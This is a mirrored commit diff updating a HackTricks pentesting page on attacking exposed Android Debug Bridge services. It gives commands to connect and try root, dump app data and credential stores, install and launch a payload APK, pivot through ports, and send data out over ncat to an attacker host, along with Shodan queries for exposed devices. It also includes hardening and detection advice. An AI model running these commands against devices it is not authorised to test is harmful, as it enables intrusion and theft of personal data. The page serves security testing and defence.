maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #1286 from HackTricks-wiki/research_update_src_network-services-pentesting_5555-android-debug-bridge_20250814_082841

Browse Source 
Research Update Enhanced src/network-services-pentesting/555...
This commit is contained in:
SirBroccoli 2025-08-19 02:05:34 +02:00 committed by GitHub
commit 13f2a46a65
1 changed files with 120 additions and 18 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

138
src/network-services-pentesting/5555-android-debug-bridge.md
View File

@ -6,9 +6,12 @@
From [the docs](https://developer.android.com/studio/command-line/adb):
**Android Debug Bridge** (adb) is a versatile command-line tool that lets you communicate with a device. The adb command facilitates a variety of device actions, such as i**nstalling and debugging apps**, and it provides **access to a Unix shell** that you can use to run a variety of commands on a device.
Android Debug Bridge (adb) is a command-line tool to communicate with Android-based devices and emulators. Typical actions include installing packages, debugging, and getting an interactive Unix shell on the device.
**Default port**: 5555.
- Historical default TCP port: 5555 (classic "adb tcpip" mode).
- Modern Wireless debugging (Android 11+) uses TLS pairing and mDNS service discovery. The connect port is dynamic and discovered via mDNS; it may not be 5555. Pairing is done with adb pair host:port followed by adb connect. See the notes below for offensive implications.
Example nmap fingerprint:
```
PORT STATE SERVICE VERSION
@ -17,38 +20,137 @@ PORT STATE SERVICE VERSION
## Connect
If find the ADB service running in a port of a device and you can connect to it, **you can get a shell inside the system:**
If you find ADB exposed and reachable, try connecting and enumerating quickly:
```bash
adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell
adb connect <ip>[:<port>] # Default is 5555 for classic mode
adb devices -l # Confirm it shows as "device" (not unauthorized/offline)
adb shell # Get an interactive shell (uid usually shell)
whoami; id; getprop ro.debuggable ro.secure service.adb.tcp.port
adb root || true # Works on eng/userdebug/insecure builds, many emulators/IoT
```
For more ADB commands check the following page:
- If the device enforces ADB authentication (ro.adb.secure=1), youll need to be pre-authorized (USB RSA auth) or use Android 11+ Wireless debugging pairing (which requires a one-time code displayed on the device).
- Some vendor images, engineering/userdebug builds, emulators, TVs, STBs and development kits expose adbd without auth or with adbd running as root. In those cases, youll typically land directly in a shell or root shell.
For a general ADB command reference, see:
{{#ref}}
../mobile-pentesting/android-app-pentesting/adb-commands.md
{{#endref}}
### Dump App data
## Quick Post-Exploitation
In order to completely download the data of an application you can:
Once you have shell, validate privileges and SELinux context:
```bash
# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"
id; getenforce; getprop ro.build.type ro.product.model ro.build.fingerprint
```
You can use this trick to **retrieve sensitive information like chrome passwords**. For more info about this check the information a references provided [**here**](https://github.com/carlospolop/hacktricks/issues/274).
### Enumerate and capture data
- List third-party apps and paths:
```bash
pm list packages -3
pm path <pkg>
```
- If you have root (adb root or su works), you can access /data directly. If not, prefer run-as for debuggable apps:
```bash
# Without root, for a debuggable app
run-as <pkg> sh -c 'cd /data/data/<pkg> && tar cf - .' | tar xf - -C ./loot/<pkg>
# With root
cp -a /data/data/<pkg> /sdcard/<pkg>
exit
adb pull "/sdcard/<pkg>"
```
- Useful system artifacts (root required):
- /data/system/users/0/accounts.db and related AccountManager data
- /data/misc/wifi/ (network configs/keys on older versions)
- App-specific SQLite DBs and shared_prefs under /data/data/<pkg>
You can use this to retrieve sensitive info (e.g., app secrets). For notes about Chrome data considerations, see the issue referenced [here](https://github.com/carlospolop/hacktricks/issues/274).
### Code execution and payload delivery
- Install and auto-grant runtime permissions:
```bash
adb install -r -g payload.apk # -g grants all runtime perms declared in manifest
adb shell monkey -p <pkg> -c android.intent.category.LAUNCHER 1
```
- Start activities/services/broadcasts directly:
```bash
adb shell am start -n <pkg>/<activity>
adb shell am startservice -n <pkg>/<service>
adb shell am broadcast -a <action>
```
### Port forwarding and pivoting
Even without root, adb can forward local ports to device ports and vice versa. This is useful to access services bound locally on the device or to expose attacker services to the device.
- Forward host->device (access a device-local service from your host):
```bash
adb forward tcp:2222 tcp:22 # If device runs SSH (e.g., Termux/Dropbear)
adb forward tcp:8081 tcp:8080 # Expose apps local debug server
```
- Reverse device->host (let the device reach a service on your host):
```bash
adb reverse tcp:1080 tcp:1080 # Device apps can now reach host:1080 as 127.0.0.1:1080
```
- File exfiltration over sockets (no sdcard writes):
```bash
# On host: listen
ncat -lvp 9000 > dump.tar
# On device: send directory as tar (root or run-as as applicable)
adb shell "tar cf - /data/data/<pkg>" | ncat <HOST_IP> 9000
```
## Wireless Debugging (Android 11+)
Modern Android implements TLS-protected wireless debugging with device-side pairing and mDNS discovery:
```bash
# On the device: Developer options -> Wireless debugging -> Pair device with pairing code
# On attacker host (same L2 network, mDNS allowed):
adb pair <device_ip>:<pair_port> # Enter the 6-digit code shown on device
adb mdns services # Discover _adb-tls-connect._tcp / _adb._tcp services
adb connect <device_ip>:<conn_port>
```
Notes
- Ports are dynamic; dont assume 5555. mDNS service names look like:
- _adb-tls-pairing._tcp (pairing)
- _adb-tls-connect._tcp (paired connect)
- _adb._tcp (legacy/plain)
- If mDNS is filtered, classic USB-assisted enabling may still work on some builds: `adb tcpip 5555` then `adb connect <ip>:5555` (until reboot).
Offensive implications: if you can interact with the device UI (e.g., physical access or mobile MDM misconfig) to enable Wireless debugging and view the pairing code, you can establish a long-lived paired ADB channel without a cable. Some OEMs expose ADB over TCP in engineering/dev images without pairing—always check.
## Hardening / Detection
Defenders should assume any reachable adbd (TCP) is critical risk.
- Disable ADB and Wireless debugging when not needed. Revoke USB debugging authorizations in Developer options.
- Ensure network policy blocks inbound TCP/5555 and mDNS-based ADB discovery on untrusted segments.
- On devices under your control:
```bash
settings put global adb_enabled 0
setprop service.adb.tcp.port -1 # disable TCP listening (or use: adb usb)
stop adbd; start adbd # restart daemon
```
- Monitor for mDNS records `_adb._tcp`, `_adb-tls-connect._tcp`, `_adb-tls-pairing._tcp` on corporate networks and alerts for unexpected 5555 listeners.
- Inventory for insecure builds: `getprop ro.debuggable`, `ro.build.type`, and `ro.adb.secure`.
## Shodan
- `android debug bridge`
- android debug bridge
- port:5555 product:"Android Debug Bridge"
## References
- Android Developers Android Debug Bridge (adb): https://developer.android.com/studio/command-line/adb
- AOSP ADB over WiFi, pairing and mDNS service names: https://android.googlesource.com/platform/packages/modules/adb/+/refs/tags/android-vts-15.0_r2/docs/dev/adb_wifi.md
{{#include ../banners/hacktricks-training.md}}